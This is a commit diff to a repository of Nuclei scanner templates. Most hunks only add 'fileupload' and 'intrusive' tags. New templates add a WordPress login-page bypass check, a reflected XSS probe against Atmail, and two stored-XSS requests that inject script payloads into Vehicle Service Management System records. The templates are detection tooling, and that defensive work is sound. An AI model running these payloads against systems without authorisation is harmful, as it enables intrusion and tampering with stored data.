Up PoCs 2022-09-01

GhostTroops · Sep 1, 2022 · bd73133 · bd73133
1 parent 900dfe6
commit bd73133
Show file tree

Hide file tree

Showing 47 changed files with 510 additions and 40 deletions.
diff --git a/config/nuclei-templates/cnvd/2021/CNVD-2021-49104.yaml b/config/nuclei-templates/cnvd/2021/CNVD-2021-49104.yaml
@@ -13,7 +13,7 @@ info:
     cvss-score: 9.9
     cwe-id: CWE-434
   remediation: Pan Wei has released an update to resolve this vulnerability.
-  tags: pan,micro,cnvd,cnvd2021
+  tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2016/CVE-2016-3088.yaml b/config/nuclei-templates/cves/2016/CVE-2016-3088.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2016-3088
     cwe-id: CWE-20
-  tags: fileupload,kev,edb,cve,cve2016,apache,activemq
+  tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2017/CVE-2017-12615.yaml b/config/nuclei-templates/cves/2017/CVE-2017-12615.yaml
@@ -19,7 +19,7 @@ info:
     cwe-id: CWE-434
   metadata:
     shodan-query: title:"Apache Tomcat"
-  tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache
+  tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache,fileupload
 
 requests:
   - method: PUT

diff --git a/config/nuclei-templates/cves/2017/CVE-2017-15715.yaml b/config/nuclei-templates/cves/2017/CVE-2017-15715.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 8.1
     cve-id: CVE-2017-15715
     cwe-id: CWE-20
-  tags: apache,httpd,fileupload,vulhub,cve,cve2017
+  tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2017/CVE-2017-6090.yaml b/config/nuclei-templates/cves/2017/CVE-2017-6090.yaml
@@ -16,7 +16,7 @@ info:
     cwe-id: CWE-434
   metadata:
     shodan-query: http.title:"PhpCollab"
-  tags: cve2017,phpcollab,rce,fileupload,edb,cve
+  tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2018/CVE-2018-15961.yaml b/config/nuclei-templates/cves/2018/CVE-2018-15961.yaml
@@ -17,7 +17,7 @@ info:
     cwe-id: CWE-434
   metadata:
     shodan-query: http.component:"Adobe ColdFusion"
-  tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev
+  tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2018/CVE-2018-20526.yaml b/config/nuclei-templates/cves/2018/CVE-2018-20526.yaml
@@ -19,7 +19,7 @@ info:
   metadata:
     google-dork: intitle:"Roxy file manager"
     verified: "true"
-  tags: cve,cve2018,roxy,fileman,rce,upload,intrusive,packetstorm,edb
+  tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2019/CVE-2019-20183.yaml b/config/nuclei-templates/cves/2019/CVE-2019-20183.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 7.2
     cve-id: CVE-2019-20183
     cwe-id: CWE-434
-  tags: upload,edb,cve,cve2019,rce,intrusive
+  tags: edb,cve,cve2019,rce,intrusive,fileupload
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2020/CVE-2020-12800.yaml b/config/nuclei-templates/cves/2020/CVE-2020-12800.yaml
@@ -16,7 +16,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-12800
     cwe-id: CWE-434
-  tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020
+  tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2020/CVE-2020-17518.yaml b/config/nuclei-templates/cves/2020/CVE-2020-17518.yaml
@@ -17,7 +17,8 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2020-17518
     cwe-id: CWE-22
-  tags: lfi,flink,upload,vulhub,cve,cve2020,apache
+  tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive
+
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2020/CVE-2020-23972.yaml b/config/nuclei-templates/cves/2020/CVE-2020-23972.yaml
@@ -17,7 +17,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2020-23972
     cwe-id: CWE-434
-  tags: cve,cve2020,joomla,edb,packetstorm
+  tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2020/CVE-2020-24186.yaml b/config/nuclei-templates/cves/2020/CVE-2020-24186.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 10
     cve-id: CVE-2020-24186
     cwe-id: CWE-434
-  tags: rce,upload,packetstorm,cve,cve2020,wordpress,wp-plugin
+  tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2020/CVE-2020-25213.yaml b/config/nuclei-templates/cves/2020/CVE-2020-25213.yaml
@@ -17,7 +17,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-25213
     cwe-id: CWE-434
-  tags: cve,cve2020,wordpress,rce,kev
+  tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2020/CVE-2020-28871.yaml b/config/nuclei-templates/cves/2020/CVE-2020-28871.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-28871
     cwe-id: CWE-434
-  tags: cve2020,monitorr,rce,oast,unauth,edb,cve
+  tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2020/CVE-2020-35489.yaml b/config/nuclei-templates/cves/2020/CVE-2020-35489.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 10
     cve-id: CVE-2020-35489
     cwe-id: CWE-434
-  tags: cve,cve2020,wordpress,wp-plugin,rce,upload
+  tags: cve,cve2020,wordpress,wp-plugin,rce,upload,intrusive
 
 requests:
   - method: GET

diff --git a/config/nuclei-templates/cves/2021/CVE-2021-21978.yaml b/config/nuclei-templates/cves/2021/CVE-2021-21978.yaml
@@ -18,7 +18,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-21978
     cwe-id: CWE-434
-  tags: cve,cve2021,vmware,rce,packetstorm
+  tags: cve,cve2021,vmware,rce,packetstorm,fileupload,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2021/CVE-2021-22005.yaml b/config/nuclei-templates/cves/2021/CVE-2021-22005.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-22005
     cwe-id: CWE-434
-  tags: cve,cve2021,vmware,vcenter,upload,kev
+  tags: cve,cve2021,vmware,vcenter,fileupload,kev,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24236.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24236.yaml
@@ -16,7 +16,8 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-24236
     cwe-id: CWE-434
-  tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,upload,wordpress,wp-plugin
+  tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive
+
 
 variables:
   php: "{{to_lower('{{randstr}}')}}.php"

diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24917.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24917.yaml
@@ -0,0 +1,43 @@
+id: CVE-2021-24917
+
+info:
+  name: WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header
+  author: akincibor
+  severity: high
+  description: The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
+  reference:
+    - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24917
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24917
+  remediation: Fixed in version 1.9.1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-24917
+    cwe-id: CWE-863
+  metadata:
+    verified: "true"
+  tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve
+
+requests:
+  - raw:
+      - |
+        GET /wp-admin/options.php HTTP/1.1
+        Host: {{Hostname}}
+        Referer: something
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'
+
+      - type: dsl
+        dsl:
+          - "!contains(tolower(location), 'wp-login.php')"
+
+    extractors:
+      - type: kval
+        kval:
+          - location
diff --git a/config/nuclei-templates/cves/2021/CVE-2021-3378.yaml b/config/nuclei-templates/cves/2021/CVE-2021-3378.yaml
@@ -16,7 +16,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-3378
     cwe-id: CWE-434
-  tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021
+  tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021,fileupload,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2021/CVE-2021-40870.yaml b/config/nuclei-templates/cves/2021/CVE-2021-40870.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-40870
     cwe-id: CWE-434
-  tags: cve,cve2021,rce,aviatrix,kev
+  tags: cve,cve2021,rce,aviatrix,kev,fileupload,intrusive
 
 requests:
   - raw:

diff --git a/config/nuclei-templates/cves/2021/CVE-2021-43574.yaml b/config/nuclei-templates/cves/2021/CVE-2021-43574.yaml
@@ -0,0 +1,47 @@
+id: CVE-2021-43574
+
+info:
+  name: Atmail Hosting Webserver 6.5.0 - Cross-site scripting
+  author: arafatansari,ritikchaddha
+  severity: medium
+  description: |
+    Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter
+  reference:
+    - https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43574
+    - https://help.atmail.com/hc/en-us/sections/115003283988
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-43574
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"Powered by Atmail"
+    verified: "true"
+  tags: cve,cve2021,atmail,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>" does not exist'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 500
+          - 403
+        condition: or
diff --git a/config/nuclei-templates/cves/2021/CVE-2021-46068.yaml b/config/nuclei-templates/cves/2021/CVE-2021-46068.yaml
@@ -0,0 +1,51 @@
+id: CVE-2021-46068
+
+info:
+  name: Vehicle Service Management System - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46068
+  classification:
+    cve-id: CVE-2021-46068
+  metadata:
+    verified: true
+  tags: cve,cve2021,xss,vms,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
+
+      - |
+        GET /vehicle_service/admin/?page=user HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "Adminstrator\"><script>alert(document.domain)</script> Admin")'
+        condition: and
diff --git a/config/nuclei-templates/cves/2021/CVE-2021-46069.yaml b/config/nuclei-templates/cves/2021/CVE-2021-46069.yaml
@@ -0,0 +1,53 @@
+id: CVE-2021-46069
+
+info:
+  name: Vehicle Service Management System - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46069
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
+requests:
+  - raw:
+      - |
+        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /vehicle_service/classes/Master.php?f=save_mechanic HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&[email protected]&status=1
+
+      - |
+        GET /vehicle_service/admin/?page=mechanics HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
+        condition: and